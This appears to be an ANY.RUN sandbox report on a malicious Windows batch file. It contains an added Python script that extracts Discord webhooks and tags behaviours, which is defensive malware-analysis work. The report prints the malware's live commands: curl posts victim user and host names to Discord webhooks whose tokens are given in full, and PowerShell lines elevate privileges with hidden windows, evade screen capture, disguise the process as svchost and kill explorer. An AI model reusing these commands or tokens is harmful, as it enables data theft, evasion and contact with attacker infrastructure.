File name: main.bat

Full analysis: https://app.any.run/tasks/cb63c276-4a02-4c69-80c0-15913366128c
Verdict: Malicious activity
Analysis date: October 06, 2024, 03:39:44
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
discord
ims-api
generic
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines (659), with CRLF line terminators
MD5: 1D3F0763C7B030CA8DE5861E33EB2F12
SHA1: DA40E03620CA6964DF9A6CDDE5FEA57F7B8C7AAE
SHA256: C586885272A42ABA67487186920CC90DDFCF8690F28FD05AE98BBC1B572204ED
SSDEEP: 192:wdEdpEFc5B7bbtSNCkQFoJQHxt9cxNRJXsEWVejOFj9F:wqdXb7OJ8oSHxGMP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3828)
      • powershell.exe (PID: 1656)
  • SUSPICIOUS

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)
    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 6232)
      • net.exe (PID: 7164)
      • cmd.exe (PID: 6436)
      • net.exe (PID: 4224)
    • Powershell scripting: start process

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 3828)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3828)
    • Get information on the list of running processes

      • cmd.exe (PID: 6436)
    • Imports DLL using pinvoke

      • powershell.exe (PID: 2480)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 832)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 832)
    • Kill processes via PowerShell

      • powershell.exe (PID: 6284)
      • powershell.exe (PID: 4528)
      • powershell.exe (PID: 2572)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • cmd.exe (PID: 6436)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 6436)
    • The process checks if current user has admin rights

      • cmd.exe (PID: 6436)
  • INFO

    • Checks supported languages

      • curl.exe (PID: 1448)
      • curl.exe (PID: 2964)
      • curl.exe (PID: 4280)
      • curl.exe (PID: 2820)
      • csc.exe (PID: 832)
      • cvtres.exe (PID: 5668)
    • Reads the computer name

      • curl.exe (PID: 2964)
      • curl.exe (PID: 1448)
      • curl.exe (PID: 4280)
      • curl.exe (PID: 2820)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 5276)
      • WMIC.exe (PID: 2964)
    • The process uses the downloaded file

      • powershell.exe (PID: 3828)
    • Attempting to use instant messaging service

      • curl.exe (PID: 2964)
      • curl.exe (PID: 2820)
      • curl.exe (PID: 4280)
      • curl.exe (PID: 1448)
      • curl.exe (PID: 5512)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 832)
    • Create files in a temporary directory

      • csc.exe (PID: 832)
      • cvtres.exe (PID: 5668)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2480)

ims-api

PID 6436, cmd.exe
Discord-Webhook-Tokens (2):
  1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
  1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
Discord-Info-Links:
  Get Webhook Info: https://discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
  Get Webhook Info: https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 171
Monitored processes: 35
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Process nodes in render order (the second cmd.exe is the node flagged THREAT): cmd.exe, conhost.exe, curl.exe, wmic.exe, findstr.exe, curl.exe, net.exe, net1.exe, powershell.exe, cmd.exe [THREAT], conhost.exe, curl.exe, wmic.exe, findstr.exe, curl.exe, net.exe, net1.exe, powershell.exe, csc.exe, cvtres.exe, powershell.exe (x8), curl.exe, textinputhost.exe, startmenuexperiencehost.exe, tiworker.exe, searchapp.exe, mobsync.exe, svchost.exe

Process information

Columns: PID, CMD, Path, Indicators, Parent process
PID: 832
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.cmdline"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
PID: 1448
CMD: curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 1656
CMD: powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\admin\AppData\Local\Temp\main.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 2480
CMD: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2572
CMD: powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 2820
CMD: curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ucrtbase.dll
PID: 2820
CMD: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -Embedding
Path: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe
Parent process: svchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Exit code:
0
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
PID: 2964
CMD: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 2964
CMD: wmic computersystem get manufacturer,model
Path: C:\Windows\System32\wbem\WMIC.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID: 3828
CMD: powershell -Command "Start-Process -FilePath 'C:\Users\admin\AppData\Local\Temp\main.bat' -Verb RunAs" -WindowStyle Hidden
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
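The ims-api indicator above and the signature hits on the PowerShell processes can be re-derived directly from the command lines in the Process information table. The script below is an added example, not part of the ANY.RUN report or of main.bat itself: it pulls Discord webhook ids and tokens out of raw command lines, decodes the JSON body that curl posts to the webhook, and tags the behaviours the signature list reports (hidden window, UAC elevation via -Verb RunAs, admin-rights check, P/Invoke through Add-Type, SetWindowDisplayAffinity anti-capture, explorer kill, WMIC recon). The embedded command lines are copied from this report; the tag names, regexes and function names are this example's own.

```python
"""Triage the process command lines from this ANY.RUN report.

Added example, not part of the sandbox report or of main.bat. Tag names,
regexes and function names are this example's own assumptions.
"""
import json
import re

# Discord webhook URL: numeric snowflake id, then an opaque URL-safe token.
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]+)"
)
# The quoted body curl sends with -d/--data; the \" inside it is a cmd.exe-level escape.
CURL_BODY_RE = re.compile(r'(?:^|\s)(?:-d|--data(?:-raw)?)\s+"((?:[^"\\]|\\.)*)"')

# Behaviour tags keyed by a regex over the command line (case-insensitive).
BEHAVIOUR_PATTERNS = {
    "discord_webhook": WEBHOOK_RE,
    # In PID 3828 this is an argument to powershell.exe itself; in PID 1656 it is
    # passed to Start-Process, so it hides the relaunched elevated cmd.exe instead.
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "uac_elevation": re.compile(r"-Verb\s+RunAs", re.I),
    "admin_check": re.compile(r"WindowsBuiltInRole\]::Administrator", re.I),
    "pinvoke": re.compile(r"Add-Type.*DllImport", re.I | re.S),
    "anti_capture": re.compile(r"SetWindowDisplayAffinity", re.I),
    "kills_explorer": re.compile(r"Stop-Process\s+-Name\s+explorer", re.I),
    "wmi_recon": re.compile(r"^\s*wmic\b", re.I),
}

# (pid, image, command line) copied from the Process information table of this report.
REPORT_EVENTS = [
    (3828, "powershell.exe", r'''powershell -Command "Start-Process -FilePath 'C:\Users\admin\AppData\Local\Temp\main.bat' -Verb RunAs" -WindowStyle Hidden'''),
    (1656, "powershell.exe", r'''powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\admin\AppData\Local\Temp\main.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"'''),
    (2480, "powershell.exe", r'''powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'"'''),
    (2572, "powershell.exe", r'powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"'),
    (1448, "curl.exe", r'curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"'),
    (2820, "curl.exe", r'curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"'),
    (2964, "curl.exe", r'curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"'),
    (2964, "WMIC.exe", "wmic computersystem get manufacturer,model"),
]


def extract_discord_webhooks(cmdline):
    """Return (webhook_id, token) pairs found in one command line."""
    return WEBHOOK_RE.findall(cmdline)


def extract_curl_json_body(cmdline):
    """Decode the JSON body curl posts with -d, after undoing the \" escapes."""
    m = CURL_BODY_RE.search(cmdline)
    if not m:
        return None
    try:
        return json.loads(m.group(1).replace('\\"', '"'))
    except json.JSONDecodeError:
        return None


def tag_behaviours(cmdline):
    """Set of behaviour tags whose pattern matches the command line."""
    return {name for name, pat in BEHAVIOUR_PATTERNS.items() if pat.search(cmdline)}


def triage(events):
    """One record per (pid, image, cmdline): tags, webhooks and, for curl, the posted body."""
    records = []
    for pid, image, cmdline in events:
        records.append({
            "pid": pid,
            "image": image,
            "tags": tag_behaviours(cmdline),
            "webhooks": extract_discord_webhooks(cmdline),
            "payload": extract_curl_json_body(cmdline) if image.lower() == "curl.exe" else None,
        })
    return records


def unique_webhook_ids(events):
    """Sorted, de-duplicated webhook ids across all command lines (the C2 channel)."""
    return sorted({wid for _, _, c in events for wid, _ in extract_discord_webhooks(c)})


if __name__ == "__main__":
    for rec in triage(REPORT_EVENTS):
        print(rec["pid"], rec["image"], sorted(rec["tags"]), rec["payload"])
    print("webhook ids:", unique_webhook_ids(REPORT_EVENTS))
```

Run over the report's own command lines, the script recovers only the 1292044762974785547 webhook; the 1291851445620047963 token listed under ims-api appears in the script body matched by YARA, not in any spawned process command line, which is why a command-line-only detection would miss it.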
Total events: 62 204
Read events: 62 080
Write events: 116
Delete events: 8

Modification events

PID 3828, powershell.exe
  Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
  Operation: write  Name: C:\WINDOWS\System32\cmd.exe.FriendlyAppName
  Value: Windows Command Processor
PID 3828, powershell.exe
  Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
  Operation: write  Name: C:\WINDOWS\System32\cmd.exe.ApplicationCompany
  Value: Microsoft Corporation
PID 4780, StartMenuExperienceHost.exe
  Key: \REGISTRY\A\{fa0c0d3e-5919-37cd-32a2-e08bb9459807}\LocalState\DataCorruptionRecovery
  Operation: write  Name: InitializationAttemptCount
  Value: 01000000384AB376A117DB01
PID 4780, StartMenuExperienceHost.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties
  Operation: write  Name: Completed
  Value: 1
PID 4780, StartMenuExperienceHost.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties_AppUsageData
  Operation: write  Name: Completed
  Value: 1
PID 4780, StartMenuExperienceHost.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties_TargetedContentTiles
  Operation: write  Name: Completed
  Value: 1
PID 2820, TiWorker.exe
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
  Operation: write  Name: SessionIdHigh
  Value: 31135649
PID 2820, TiWorker.exe
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
  Operation: write  Name: SessionIdLow
  Value:
PID 4780, StartMenuExperienceHost.exe
  Key: \REGISTRY\A\{fa0c0d3e-5919-37cd-32a2-e08bb9459807}\LocalState\DataCorruptionRecovery
  Operation: write  Name: InitializationAttemptCount
  Value: 0000000086FEE276A117DB01
PID 4780, StartMenuExperienceHost.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\$de${c6a388c9-afd3-47e2-a46b-29cb43ad4323}$start.tilegrid$windows.data.curatedtilecollection.tilecollection\Current
  Operation: write  Name: Data
  Value: 020000004319E676A117DB0100000000434201000A0A00D0140CCA3200CB8C0A0212267B00410039003400310034003200440039002D0032003100350030002D0034003600380037002D0038003600390033002D003100450036003200320036003500390039003900430031007D000012267B00390033004600380044003900390046002D0036003500300041002D0034003100330035002D0038004200340043002D003200460046004100410041003300450046004600340039007D0000E22C01010000
Executable files: 3
Suspicious files: 56
Text files: 338
Unknown types: 0

Dropped files

PID | Process | Filename | Type
2480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.0.cs | text
  MD5: 32E8AF8C0F84A8BB4647574F7D67F717
  SHA256: 6E0CCA3BBA43EBD5456B392D1B69740A3778B8A9FA86DAD6209C3FBE32335E7A
1656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tn5theyw.5pd.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.cmdline | text
  MD5: 39330EF64EEC82E327E70AC8E4BB7CF6
  SHA256: 5AAAD730EB89E7ABE178D2861532DFF67EC70B9CC648B72F9B1333D40092CC5B
5668 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES777F.tmp | binary
  MD5: BD6E3BE2E919B2769DCC7602ECA4839F
  SHA256: 17442B8B9CF94FF33181187F67EEDAD7ED37904570BEF343E95EABB8D63ED043
2480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qfe2owuf.2ae.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o53gj0yn.55z.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
832 | csc.exe | C:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.out | text
  MD5: FEAA941680D0ACD1B158990C10991748
  SHA256: 41DE29E331C58BB74369703C39799A9080C7099C56171AEE5DADC1A209A50C03
3828 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
  MD5: A757EC0601F6300B3C85CA9F747C80B9
  SHA256: 1475B488B89536C0C402C8C735FF2A8FA83014EA60554538DFB1AAB486E7A013
6284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4pccft4r.itw.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gveaevhb.idb.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 69
DNS requests: 23
Threats: 7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2120
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
768
lsass.exe
GET
200
142.250.186.131:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
768
lsass.exe
GET
200
142.250.186.131:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
5032
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4848
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
2836
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2836
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4712
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
8
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
2964
curl.exe
162.159.138.232:443
discord.com
CLOUDFLARENET
whitelisted
768
lsass.exe
142.250.186.131:80
c.pki.goog
GOOGLE
US
whitelisted
1448
curl.exe
162.159.138.232:443
discord.com
CLOUDFLARENET
whitelisted
4324
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.110
whitelisted
discord.com
  • 162.159.138.232
  • 162.159.135.232
  • 162.159.136.232
  • 162.159.137.232
  • 162.159.128.233
whitelisted
c.pki.goog
  • 142.250.186.131
whitelisted
login.live.com
  • 20.190.160.17
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.76
  • 40.126.32.74
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.136
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
client.wns.windows.com
  • 40.115.3.253
  • 40.113.103.199
whitelisted
go.microsoft.com
  • 184.30.17.189
whitelisted
ptb.discord.com
  • 162.159.128.233
  • 162.159.135.232
  • 162.159.136.232
  • 162.159.138.232
  • 162.159.137.232
whitelisted

Threats

PID
Process
Class
Message
2256
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2964
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
1448
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
4280
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2820
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2256
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
5512
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
No debug info